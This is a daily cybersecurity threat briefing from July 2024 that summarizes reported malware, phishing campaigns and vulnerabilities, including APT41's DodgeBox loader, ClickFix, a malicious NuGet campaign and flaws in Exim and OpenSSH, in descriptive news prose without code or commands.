Cyware Daily Threat Intelligence

Daily Threat Briefing • Jul 12, 2024
This website uses cookies and similar technologies to provide essential functionality and improve your experience. Some features, such as demo scheduling and chat support, require marketing cookies to function. By clicking "Accept All", you consent to all cookies. Alternatively, you can customize your preferences, but note that declining marketing cookies will limit certain website features.
Daily Threat Briefing • Jul 12, 2024
The infamous cyber-espionage syndicate APT41 has bolstered its malware toolkit with DodgeBox and MoonWalk. DodgeBox, a successor to StealthVector, is an advanced shellcode loader. Notably, it deploys the MoonWalk backdoor, which ingeniously leverages Google Drive for C2 operations.
In a parallel cyber menace, over 1.5 million email servers stand exposed to a severe Exim mail transfer agent flaw, rated 9.1 in severity. This vulnerability circumvents defenses against malicious attachments, affecting Exim versions up to 4.97.1, with a fix available in Release Candidate 3 of Exim 4.98.
Additionally, the Smishing Triad has orchestrated a sophisticated campaign in India, masquerading as India Post to phish for PII and payment information via fraudulent iMessage.
Meet DodgeBox, APT41’s new malware
The Chinese government-backed cyber espionage group APT41 has added a new loader called DodgeBox and a backdoor named MoonWalk to its arsenal of malware tools, according to research by Zscaler ThreatLabz. DodgeBox, similar to APT41's StealthVector, is a shellcode loader with advanced features such as encryption, environment checks, and evasion techniques. It also drops the MoonWalk backdoor, which utilizes Google Drive for command-and-control communication.
New FishXProxy phishing kit
A new phishing toolkit called FishXProxy enables cybercriminals to conduct sophisticated phishing attacks with ease. The toolkit includes advanced features such as an antibot system, Cloudflare integration, inbuilt redirector, page expiration settings, and cross-project user tracking. It also allows for the generation of malicious file attachments using HTML smuggling techniques. The toolkit lowers the technical barriers to conducting phishing campaigns, posing a significant threat.
ClickFix infection chain deploys malware
McAfee Labs discovered a new malware delivery method called the ClickFix infection chain, which uses social engineering to trick users into executing malicious scripts. This method starts with users visiting compromised websites and being redirected to fake popup windows, where they are instructed to paste a script into a PowerShell terminal, leading to malware infiltration. The sophisticated technique is used by malware families like Lumma Stealer and DarkGate, with the latter being particularly challenging to detect and remove. Phishing emails also play a crucial role in this infection chain by tricking users into downloading and executing malicious software.
Malicious NuGet campaign
ReversingLabs detailed a malicious campaign targeting the NuGet package manager, which has evolved to include tactics such as using obfuscated downloaders, exploiting NuGet’s MSBuild integrations, and manipulating legitimate PE .NET binaries using IL weaving. The threat actors used techniques like typo-squatting and homoglyphs to evade detection and distributed malicious code, including the SeroXen RAT. Approximately 60 packages and 290 package versions were identified as part of this campaign.
Exim bug affects 1.5 million servers
Over 1.5 million email servers are vulnerable to attacks due to a critical Exim mail transfer agent vulnerability, making it easy for threat actors to deliver executable attachments. The vulnerability, tracked as CVE-2024-39929, has a severity rating of 9.1 out of 10. It allows threat actors to bypass protections that prevent sending attachments that install apps or execute code. The vulnerability exists in all Exim versions up to and including 4.97.1, and a fix is available in the Release Candidate 3 of Exim 4.98.
New OpenSSH vulnerability spotted
A new signal handler race condition was discovered in the core sshd daemon used in RHEL 9.x and its derivatives. The vulnerability, tagged as CVE-2024-6409, affects OpenSSH versions 8.7p1 and 8.8p1, which were used in Fedora 36 and 37, as well as RHEL 9. The flaw allows remote code execution, but the affected code runs with reduced privileges, limiting the potential impact. However, it is less likely to affect users of end-of-life Fedora versions and other distros.
Smishing Triad targets India
Smishing Triad has been registering multiple domain names impersonating the India Post to carry out large-scale smishing campaigns to steal PII and payment data. The group uses compromised and registered iCloud accounts to send fraudulent iMessages with smishing URLs, directing victims to provide personal and payment details under the pretext of a failed package delivery. This threat has been observed targeting a wide range of individuals in India, including consumers, businesses, and government entities.